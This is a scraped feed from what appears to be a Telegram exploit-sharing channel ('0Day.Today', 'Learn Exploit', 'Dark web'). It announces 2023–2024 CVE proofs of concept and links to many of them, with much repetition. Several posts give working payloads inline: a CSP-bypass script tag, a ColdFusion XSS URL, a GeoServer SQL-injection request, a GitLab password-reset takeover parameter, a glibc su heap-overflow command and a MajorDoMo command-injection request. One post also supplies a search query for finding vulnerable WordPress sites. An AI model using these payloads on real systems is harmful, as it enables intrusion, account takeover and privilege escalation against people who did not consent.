You can bypass CSP on any website that allows http://microsoft.com in a script-src
PoC:
octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC:
<script src=http://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>
This works because of the WordPress CSP bypass our engineer (octagon) found last year : octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-0386 - PoC Exploit Released for Linux Kernel Privilege Escalation
Link
Exploit
#POC #exploit #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
Exploit
#POC #exploit #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
ColdFusion Debug XSS
POC: {{host}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(document.domain)
#POC #CVE #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
POC: {{host}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(document.domain)
#POC #CVE #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-38831
WinRAR 6.22 code execution PoC
Github
#exploit #CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
WinRAR 6.22 code execution PoC
Github
#exploit #CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-30547 - PoC Exploit for VM2 Sandbox Escape Vulnerability
Github
#cve #poc #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#cve #poc #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - rvizx/CVE-2023-30547: PoC Exploit for VM2 Sandbox Escape Vulnerability
PoC Exploit for VM2 Sandbox Escape Vulnerability. Contribute to rvizx/CVE-2023-30547 development by creating an account on GitHub.
PoC for CVE-2023-50164 - Proof of Concept for Path Traversal in Apache Struts
Github
#POC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#POC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - dwisiswant0/cve-2023-50164-poc: Proof of Concept for Path Traversal in Apache Struts ("CVE-2023-50164")
Proof of Concept for Path Traversal in Apache Struts ("CVE-2023-50164") - dwisiswant0/cve-2023-50164-poc
CVE-2023-50254 PoC Exploit for Deepin-reader RCE
POC
Read
#CVE #POC #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
Read
#CVE #POC #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-25157
#CVE #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeNamosloe=gwpd:chinamap11&CQL_FILTER=strStartsWith%28Vatican City%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1
#CVE #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-27524 ( Apache Superset Auth Bypass ) Exploit #CVE #Exploit #POC —————— 0Day.Today @LearnExploit @Tech_Army
CVE-2023-27524 - Apache Superset Auth Bypass and RCE
Github
#CVE #Exploit #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Exploit #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions
Poc:
#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
Poc:
user[email][]=valid@email.com&user[email][]=attacker@email.com
#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions Poc: user[email][]=valid@email.com&user[email][]=attacker@email.com #CVE #POC ———— 0Day.Today @LearnExploit @Tech_Army
GitHub
GitHub - Vozec/CVE-2023-7028: This repository presents a proof-of-concept of CVE-2023-7028
This repository presents a proof-of-concept of CVE-2023-7028 - Vozec/CVE-2023-7028
CVE-2023-6875 - Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-26360 - Unauthenticated RCE in Adobe Coldfusion
POC
#CVE #POC #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
#CVE #POC #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management
Unauthenticated RCE in Adobe Coldfusion – CVE-2023-26360
Overview CVE-2023-263060 was exploited in the wild in Adobe ColdFusion product, a commercial application server for rapid web application development. The vulnerability affects both the 2018 and...
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2023-6246 - Heap-based buffer overflow in the glibc's syslog
POC :
(exec -a "
#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
POC :
(exec -a "
printf '%0128000x' 1
" /usr/bin/su < /dev/null)#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-21413: Microsoft Outlook Leak Hash
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC
#CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC
#CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
UPSTYLE backdoor targeting GlobalProtect VPN devices via CVE-2024-3400 in 3 images/stages 🔥
Github
#poc #backdoor #0day
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#poc #backdoor #0day
——————
0Day.Today
@LearnExploit
@Tech_Army
MajorDoMo thumb RCE
#rce #Poc #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1``
#rce #Poc #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Linksys routers POCs
CVE-2024-33788
CVE-2024-33789
#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-33788
CVE-2024-33789
#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army